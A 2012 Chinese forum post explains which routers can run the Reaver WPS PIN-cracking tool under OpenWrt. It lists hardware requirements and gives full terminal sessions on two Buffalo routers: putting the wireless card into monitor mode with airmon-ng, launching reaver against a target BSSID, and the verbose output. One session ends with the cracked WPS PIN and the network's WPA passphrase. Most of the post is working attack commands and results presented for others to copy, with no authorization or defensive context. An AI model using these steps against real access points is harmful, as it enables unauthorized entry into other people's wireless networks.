|
|
本帖最后由 FreeDOS 于 2012-7-22 13:49 编辑
如题一款路由器要支持reaver pin 路由器要满足四大条件
1.cpu采用little endian方式存储数据,并且主频不能过低
2.flash剩余可用不能过低,一般8m的flash够用了
3.路由支持刷openwrt
4.路由的无线网卡要能被reaver驱动
我使用的两款路由器都支持reaver
下面是路由器的运行截取代码
1.Buffalo WHR-G54S
CPU Broadcom BMIPS3300 is little-endian
root@OpenWrt:/# iwconfig wlan0 essid RalinkInitAP_ABEA34 channel 8
root@OpenWrt:/# ifconfig wlan0 up
root@OpenWrt:/# airmon-ng start wlan0
ps: invalid option -- A
BusyBox v1.19.4 (2012-05-04 03:00:00 JST) multi-call binary.
Usage: ps
Show list of processes
w Wide output
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
root@OpenWrt:/# reaver -i mon0 -b 0:18:84:AB:xx:xx -c 8 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 8
[+] Waiting for beacon from 00:18:84:AB:xx:xx
[+] Associated with 00:18:84:AB:xx:xx (ESSID: RalinkInitAP_ABEA34)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
^C
[!] WARNING: Receive timeout occurred
[+] Session saved.
这款路由器由于主频过低经常卡死,但却可以进入pin
2.Buffalo WHR-G300N(Ralink RT3052) OpenWRT trunk r30461这款的配置还可以,不过并不是最理想的
iwconfig wlan0 essid RalinkInitAP channel 6
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b XX-XX-XX-XX-XX-XX -c 6 -vv
:
[+] 96.51% compl[10600.100000] device mon0 left promiscuous mode
ete @ 1970-01-01 02:56:40 (5 seconds/pin)
[10601.110000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sen[10604.940000] device mon0 left promiscuous mode
ding M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[10605.950000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[10610.060000] device mon0 left promiscuous mode
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 10355 seconds
[+] WPS PIN: '12666126'
[+] WPA PSK: 'abcdefg12345678'
[+] AP SSID: 'RalinkInitAP'花了我将近3个小时,所以说路由的硬件要尽量的好
关于reaver在openwrt中的编译就直接引用论坛一位网友的贴子,望见谅!!!
【教程】编译能在Openwrt上运行的Reaver
https://www.right.com.cn/forum/thread-74891-1-1.html
|
评分
-
查看全部评分
|
IP卡
狗仔卡
发表于 2012-7-22 13:49
置顶卡
沉默卡
喧嚣卡
顶贴卡
显身卡